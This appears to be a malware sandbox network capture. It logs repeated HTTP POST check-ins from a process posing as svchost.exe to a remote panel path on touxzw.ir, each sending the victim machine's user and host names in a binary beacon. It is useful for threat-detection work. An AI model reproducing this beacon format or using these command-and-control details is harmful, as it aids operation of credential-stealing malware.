Feb 27, 2025 23:41:21.084507942 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:21.862329960 CET	846	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:41:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6nUjIOkYS8eccF7Sa6lFGgSEI6%2FKRyHmHKPymTDa4jT3xbQbVA4yT9Sym5lB3uB7DzwV5SlgS7K2%2FIxRh%2FDfD3YKTJhNlfGboG%2B%2FbdSTsdpmGIdfu3uPztlQieg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bae8d5da243e8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1698&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:23.015530109 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:23.021054029 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:23.787847042 CET	854	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:41:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qtcTR9jhaN3Vc40ZOrwH%2BNtZVhl9Jfy1ahLuylZ3eGbYkdS2Chxj03gf%2FzAh72twT%2BHyo%2BY%2BAzLDl42x%2FciX1qLDp3qHw9R%2BknMrfxBlZ6Q5nZqQ%2BQZu%2BxfWna4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bae995eb54357-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1631&rtt_var=815&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49735	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:25.170804024 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:25.175848961 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:25.922359943 CET	826	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:41:25 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g1dKTAMBbR8tCjpGQCGYql6j%2Bi%2FnCOI4qaxezGZcyZVIJ4ZCsJnlfKs69zhrKSrwkZ%2FkzE4kVU%2F%2BuL6qaXvZIe10TI3LPq9mMnKCaQTvRnNCQshHtxW%2FTdGxPP8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baea6ebcec445-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49736	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:27.078305006 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:27.083384037 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:27.811327934 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:41:27 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=slIvDDZV57OVlQv9WOXbmh8DwDBW2h1VsjBfdcUW3ykePg163GQ6cbpTBjeUrO1GXFgqveTKtajJkqzbnt%2BTD0WRW%2BRpvOZ%2Blr3R6ffNEVrVDpz7Ombj6jewx4Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baeb2bd22c47a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1645&rtt_var=822&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49737	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:28.969017029 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:28.974468946 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:29.728553057 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:41:29 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cVsQMhxreKL3idHP9dffPyKayljAmNTnqMYyyvQyQ94dFhP83dY1Zh4HwP3mkeBvYlLawFB1dwFWzgaQ2UJZQCfzHs6JWnP%2FK%2BntdEs4i8wCcrdg%2F1uhCwX%2B8cE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baebeae780f55-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1622&rtt_var=811&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49738	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:30.894737959 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:30.900861025 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:31.687180042 CET	843	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:41:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ooS7M6p3hFovmhe3j4vtwpcB0Z6qdS3KZw9OudztqDIsLuMKQ2S3kTvFOHw%2FYPN3eTjKlOsvX%2BczeL1up%2FGkdevABbkFCkmbxby4MUuCOCfP32ZJX9jF87jTRo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baecabf768c54-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2286&min_rtt=2286&rtt_var=1143&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49741	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:32.862721920 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:32.867990017 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:33.644524097 CET	831	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:41:33 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ErEZEl3HdpFh2%2BvT1Q9xkWKpcABvf%2FxCq%2BcYH3Ut5Jun1Jed45opNm%2F3lUaa7augi%2FCGuThS9RJ4i793xbrjUQj9TyLIsIerjrsZvNb6%2FLDRtLwUsT%2F6my7Ms10%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baed72afc4303-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10133&min_rtt=10133&rtt_var=5066&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:34.790688992 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:34.795860052 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:35.538904905 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:41:35 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LwOM1ClDbNatMsv3Njwk69X2OBKGeOW7l%2BO8dwM%2Bhpv6WWgVok2vH1XtDRiMjDx605kAk1I98Nd0ZKEAsLMzJ%2Bkq8r848KTmncz52j%2BZUsHIdSkYdyNdx6p2agY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baee30b338c1e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1993&rtt_var=996&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:36.667927027 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:36.673080921 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:37.418924093 CET	818	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:41:37 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BwtCmwg19pG5RiYx5gy%2BUIbBFau6v4pAD5OJgSeMuYDMuJoi2kiycSJmruVBaWeM0v7jeMDVOLLNAmJrIZey3wtkld%2BWC8AEgfNL4ZpoEW3i6cSWJfTkkVd5vwY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baeeecbe543e3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1790&rtt_var=895&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49748	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:38.577291965 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:38.584676027 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:39.461065054 CET	844	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:41:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uWFhaE3whz641PbAwea1oeP%2FawC2cszFaVNg%2Fol0qMePdm9h41xMs0xVTj6jkkG517g8%2Bc5PDXF9gN3rRE140fUZA71tMRI%2FS7pDvFKy1hew22itM5G63muKK38%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baefadba141fe-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1917&min_rtt=1917&rtt_var=958&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49749	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:40.623343945 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:40.628415108 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:41.340774059 CET	830	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:41:41 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2FptQTsAWpmgXEv%2BKir1dXZh%2B%2FyjSQPLCJPI%2FjaqDXPIAdCh4XdQe%2BEWj0jTeQOYwNSKaInykG193oSgsA5GW8ss3pH63R8u1%2FeYBmrA2YfDhixYFHY4Mw1%2Fltc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baf076ac2431b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1727&rtt_var=863&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:42.492409945 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:42.497605085 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:43.301222086 CET	844	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:41:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0qiQZaPuGrFNy0Rq8NLirLHUMBtLk4c8win3EE1lOVFdGuEaWHrrWKwTM0I6r%2BswqqSoQZDicYpmqlb%2FudGuEOmB9RH9fJHL93nM%2FRYPw68fARE%2FKIgdjcoLqCU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baf13391a43d5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1767&rtt_var=883&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49751	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:44.453835964 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:44.459058046 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:45.245909929 CET	846	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:41:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TaIoEu90mJIngsLChlXdeXqdtZKYGU9ZcfouoSc95k%2Bcy%2FC7o1517Gy%2BhY6zGUyl67GWh%2FlcLgA0LWFhPNrMS0H7eAfJzYo7wcv10zB1fSSUwb%2FJBO9e95QEXvw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baf1f587d1821-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1736&rtt_var=868&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49752	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:46.419303894 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:46.424571037 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:47.207174063 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:41:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hxnlou21wpYhw7he1yYk0MyJh2Hn52lmT0cuCDuHv%2FeiRJ1D%2BHgOlTGuNIW%2BvUR5uqYOitpVYG4s2RPHXiL5ccHSy0SB0X5BHlEC2Uq7wy7fZL7Ok2GaZ15qCzs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baf2bab8343b5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1689&rtt_var=844&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49753	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

